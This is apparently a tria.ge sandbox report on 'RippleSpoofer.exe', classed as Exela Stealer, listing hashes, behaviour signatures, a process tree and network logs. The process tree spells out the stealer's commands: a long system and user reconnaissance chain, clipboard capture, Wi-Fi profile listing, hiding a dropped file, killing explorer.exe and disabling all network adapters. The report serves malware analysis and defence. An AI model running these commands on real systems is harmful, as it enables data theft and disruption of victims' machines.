Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/11/2024, 00:14 UTC

General

  • Target

    RippleSpoofer.exe

  • Size

    15.6MB

  • MD5

    76ed914a265f60ff93751afe02cf35a4

  • SHA1

    4f8ea583e5999faaec38be4c66ff4849fcf715c6

  • SHA256

    51bd245f8cb24c624674cd2bebcad4152d83273dab4d1ee7d982e74a0548890b

  • SHA512

    83135f8b040b68cafb896c4624bd66be1ae98857907b9817701d46952d4be9aaf7ad1ab3754995363bb5192fa2c669c26f526cafc6c487b061c2edcceebde6ac

  • SSDEEP

    393216:QAiUmWQEnjaa4cqmAa4ICSSF1a0HPRV8gtFlSiZh5ZlZ:bhnGhMAXSmHXFA+

Malware Config

Signatures

  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Exelastealer family
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • A potential corporate email address has been identified in the URL: httpswww.youtube.com@ripple9cbrd1
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RippleSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\RippleSpoofer.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/@ripple9
      2⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4940
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb213a46f8,0x7ffb213a4708,0x7ffb213a4718
        3⤵
          PID:4876
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1730578732429029788,7718376635075180444,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
          3⤵
            PID:2104
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1730578732429029788,7718376635075180444,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1608
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,1730578732429029788,7718376635075180444,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8
            3⤵
              PID:556
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1730578732429029788,7718376635075180444,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
              3⤵
                PID:3176
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1730578732429029788,7718376635075180444,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
                3⤵
                  PID:4416
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1730578732429029788,7718376635075180444,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
                  3⤵
                    PID:1936
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill" /F /IM explorer.exe
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2212
                • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe
                  "C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:3164
                  • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe
                    "C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3968
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "ver"
                      4⤵
                        PID:2652
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        4⤵
                          PID:1172
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic csproduct get uuid
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2596
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist"
                          4⤵
                            PID:4156
                            • C:\Windows\system32\tasklist.exe
                              tasklist
                              5⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:384
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
                            4⤵
                            • Hide Artifacts: Hidden Files and Directories
                            PID:4056
                            • C:\Windows\system32\attrib.exe
                              attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
                              5⤵
                              • Views/modifies file attributes
                              PID:4344
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist"
                            4⤵
                              PID:4376
                              • C:\Windows\system32\tasklist.exe
                                tasklist
                                5⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:644
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4876"
                              4⤵
                                PID:3624
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /PID 4876
                                  5⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3500
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                4⤵
                                  PID:1832
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c chcp
                                    5⤵
                                      PID:1840
                                      • C:\Windows\system32\chcp.com
                                        chcp
                                        6⤵
                                          PID:2420
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                      4⤵
                                        PID:4076
                                        • C:\Windows\system32\cmd.exe
                                          cmd.exe /c chcp
                                          5⤵
                                            PID:2456
                                            • C:\Windows\system32\chcp.com
                                              chcp
                                              6⤵
                                                PID:3700
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            4⤵
                                              PID:3688
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                5⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3948
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                              4⤵
                                              • Clipboard Data
                                              PID:3656
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe Get-Clipboard
                                                5⤵
                                                • Clipboard Data
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1676
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                              4⤵
                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                              PID:5108
                                              • C:\Windows\system32\netsh.exe
                                                netsh wlan show profiles
                                                5⤵
                                                • Event Triggered Execution: Netsh Helper DLL
                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                PID:3672
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                              4⤵
                                              • Network Service Discovery
                                              PID:212
                                              • C:\Windows\system32\systeminfo.exe
                                                systeminfo
                                                5⤵
                                                • Gathers system information
                                                PID:3564
                                              • C:\Windows\system32\HOSTNAME.EXE
                                                hostname
                                                5⤵
                                                  PID:3296
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic logicaldisk get caption,description,providername
                                                  5⤵
                                                  • Collects information from the system
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3548
                                                • C:\Windows\system32\net.exe
                                                  net user
                                                  5⤵
                                                    PID:2156
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 user
                                                      6⤵
                                                        PID:4568
                                                    • C:\Windows\system32\query.exe
                                                      query user
                                                      5⤵
                                                        PID:4888
                                                        • C:\Windows\system32\quser.exe
                                                          "C:\Windows\system32\quser.exe"
                                                          6⤵
                                                            PID:348
                                                        • C:\Windows\system32\net.exe
                                                          net localgroup
                                                          5⤵
                                                            PID:4744
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 localgroup
                                                              6⤵
                                                                PID:4284
                                                            • C:\Windows\system32\net.exe
                                                              net localgroup administrators
                                                              5⤵
                                                                PID:2248
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 localgroup administrators
                                                                  6⤵
                                                                    PID:3676
                                                                • C:\Windows\system32\net.exe
                                                                  net user guest
                                                                  5⤵
                                                                    PID:4156
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 user guest
                                                                      6⤵
                                                                        PID:452
                                                                    • C:\Windows\system32\net.exe
                                                                      net user administrator
                                                                      5⤵
                                                                        PID:2260
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 user administrator
                                                                          6⤵
                                                                            PID:2480
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic startup get caption,command
                                                                          5⤵
                                                                            PID:3332
                                                                          • C:\Windows\system32\tasklist.exe
                                                                            tasklist /svc
                                                                            5⤵
                                                                            • Enumerates processes with tasklist
                                                                            PID:3772
                                                                          • C:\Windows\system32\ipconfig.exe
                                                                            ipconfig /all
                                                                            5⤵
                                                                            • Gathers network information
                                                                            PID:3008
                                                                          • C:\Windows\system32\ROUTE.EXE
                                                                            route print
                                                                            5⤵
                                                                              PID:2020
                                                                            • C:\Windows\system32\ARP.EXE
                                                                              arp -a
                                                                              5⤵
                                                                              • Network Service Discovery
                                                                              PID:644
                                                                            • C:\Windows\system32\NETSTAT.EXE
                                                                              netstat -ano
                                                                              5⤵
                                                                              • System Network Connections Discovery
                                                                              • Gathers network information
                                                                              PID:4376
                                                                            • C:\Windows\system32\sc.exe
                                                                              sc query type= service state= all
                                                                              5⤵
                                                                              • Launches sc.exe
                                                                              PID:4084
                                                                            • C:\Windows\system32\netsh.exe
                                                                              netsh firewall show state
                                                                              5⤵
                                                                              • Modifies Windows Firewall
                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                              PID:1828
                                                                            • C:\Windows\system32\netsh.exe
                                                                              netsh firewall show config
                                                                              5⤵
                                                                              • Modifies Windows Firewall
                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                              PID:3560
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            4⤵
                                                                              PID:4100
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic csproduct get uuid
                                                                                5⤵
                                                                                  PID:4016
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                4⤵
                                                                                  PID:1212
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic csproduct get uuid
                                                                                    5⤵
                                                                                      PID:768
                                                                              • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\randomizer.EXE
                                                                                "C:\Users\Admin\AppData\Local\Temp\TempAppFiles\randomizer.EXE"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:2608
                                                                                • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\randomizer.EXE
                                                                                  "C:\Users\Admin\AppData\Local\Temp\TempAppFiles\randomizer.EXE"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:1548
                                                                              • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\21902902190121290mc.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\TempAppFiles\21902902190121290mc.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:5056
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c WMIC PATH WIN32_NETWORKADAPTER WHERE PHYSICALADAPTER=TRUE CALL DISABLE >nul 2>&1
                                                                                  3⤵
                                                                                    PID:2488
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      WMIC PATH WIN32_NETWORKADAPTER WHERE PHYSICALADAPTER=TRUE CALL DISABLE
                                                                                      4⤵
                                                                                        PID:3472
                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                  C:\Windows\system32\AUDIODG.EXE 0x324 0x49c
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1568
                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3056
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4364

                                                                                    Network

                                                                                    • flag-us
                                                                                      DNS
                                                                                      8.8.8.8.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      8.8.8.8.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      8.8.8.8.in-addr.arpa
                                                                                      IN PTR
                                                                                      dnsgoogle
                                                                                    • flag-us
                                                                                      DNS
                                                                                      149.220.183.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      149.220.183.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      240.221.184.93.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      240.221.184.93.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      0.159.190.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      0.159.190.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      95.221.229.192.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      95.221.229.192.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      www.dropbox.com
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      www.dropbox.com
                                                                                      IN A
                                                                                      Response
                                                                                      www.dropbox.com
                                                                                      IN CNAME
                                                                                      www-env.dropbox-dns.com
                                                                                      www-env.dropbox-dns.com
                                                                                      IN A
                                                                                      162.125.64.18
                                                                                    • flag-gb
                                                                                      GET
                                                                                      https://www.dropbox.com/scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      162.125.64.18:443
                                                                                      Request
                                                                                      GET /scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1 HTTP/1.1
                                                                                      Host: www.dropbox.com
                                                                                      Connection: Keep-Alive
                                                                                      Response
                                                                                      HTTP/1.1 302 Found
                                                                                      Content-Security-Policy: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline'
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Location: https://ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com/cd/0/get/CeUSPyov96jI3LX-7KVV55tzpPeHSZ9ZjmAL69xnzwr-qJ_rViK7XhZFjay5_M2F4p8ZDPPuEtwMpO4zeD7b3wAr6VCpZFqlw2zgh0Ts2T4gE7wVFDH2GsMDRTaDDf3hmlgLA7PR2koogtb7YRxmXoX6/file?dl=1#
                                                                                      Pragma: no-cache
                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                      Set-Cookie: gvc=MTY2ODk0MzE0ODQ2OTA4MDE0NDc2ODg5MTcxMjAwNjQ0Mjc0Nzg=; Path=/; Expires=Tue, 13 Nov 2029 00:15:07 GMT; HttpOnly; Secure; SameSite=None
                                                                                      Set-Cookie: t=DGAqoY37TBXReIsRKevkRXSa; Path=/; Domain=dropbox.com; Expires=Fri, 14 Nov 2025 00:15:07 GMT; HttpOnly; Secure; SameSite=None
                                                                                      Set-Cookie: __Host-js_csrf=DGAqoY37TBXReIsRKevkRXSa; Path=/; Expires=Fri, 14 Nov 2025 00:15:07 GMT; Secure; SameSite=None
                                                                                      Set-Cookie: __Host-ss=GXuQu6l5sc; Path=/; Expires=Fri, 14 Nov 2025 00:15:07 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                      Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 13 Nov 2029 00:15:07 GMT
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                      X-Xss-Protection: 1; mode=block
                                                                                      Content-Length: 17
                                                                                      Date: Thu, 14 Nov 2024 00:15:07 GMT
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                      Server: envoy
                                                                                      Cache-Control: no-cache, no-store
                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                      X-Dropbox-Request-Id: be6e8d9ce9104a44b2a49e0c59a6a2f6
                                                                                    • flag-us
                                                                                      DNS
                                                                                      18.64.125.162.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      18.64.125.162.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com
                                                                                      IN A
                                                                                      Response
                                                                                      ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com
                                                                                      IN CNAME
                                                                                      edge-block-www-env.dropbox-dns.com
                                                                                      edge-block-www-env.dropbox-dns.com
                                                                                      IN A
                                                                                      162.125.64.15
                                                                                    • flag-gb
                                                                                      GET
                                                                                      https://ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com/cd/0/get/CeUSPyov96jI3LX-7KVV55tzpPeHSZ9ZjmAL69xnzwr-qJ_rViK7XhZFjay5_M2F4p8ZDPPuEtwMpO4zeD7b3wAr6VCpZFqlw2zgh0Ts2T4gE7wVFDH2GsMDRTaDDf3hmlgLA7PR2koogtb7YRxmXoX6/file?dl=1
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      162.125.64.15:443
                                                                                      Request
                                                                                      GET /cd/0/get/CeUSPyov96jI3LX-7KVV55tzpPeHSZ9ZjmAL69xnzwr-qJ_rViK7XhZFjay5_M2F4p8ZDPPuEtwMpO4zeD7b3wAr6VCpZFqlw2zgh0Ts2T4gE7wVFDH2GsMDRTaDDf3hmlgLA7PR2koogtb7YRxmXoX6/file?dl=1 HTTP/1.1
                                                                                      Host: ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com
                                                                                      Connection: Keep-Alive
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Content-Type: application/binary
                                                                                      Accept-Ranges: bytes
                                                                                      Cache-Control: max-age=60
                                                                                      Content-Disposition: attachment; filename="version.json"; filename*=UTF-8''version.json
                                                                                      Content-Security-Policy: sandbox
                                                                                      Etag: 1725398947624654d
                                                                                      Pragma: public
                                                                                      Referrer-Policy: no-referrer
                                                                                      Vary: Origin
                                                                                      X-Content-Security-Policy: sandbox
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                      X-Server-Response-Time: 273
                                                                                      X-Webkit-Csp: sandbox
                                                                                      Date: Thu, 14 Nov 2024 00:15:08 GMT
                                                                                      Server: envoy
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Content-Length: 26
                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                      X-Dropbox-Request-Id: 547cf57dbfab4a82ab24eb6ebe06a637
                                                                                    • flag-us
                                                                                      DNS
                                                                                      15.64.125.162.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      15.64.125.162.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      13.86.106.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
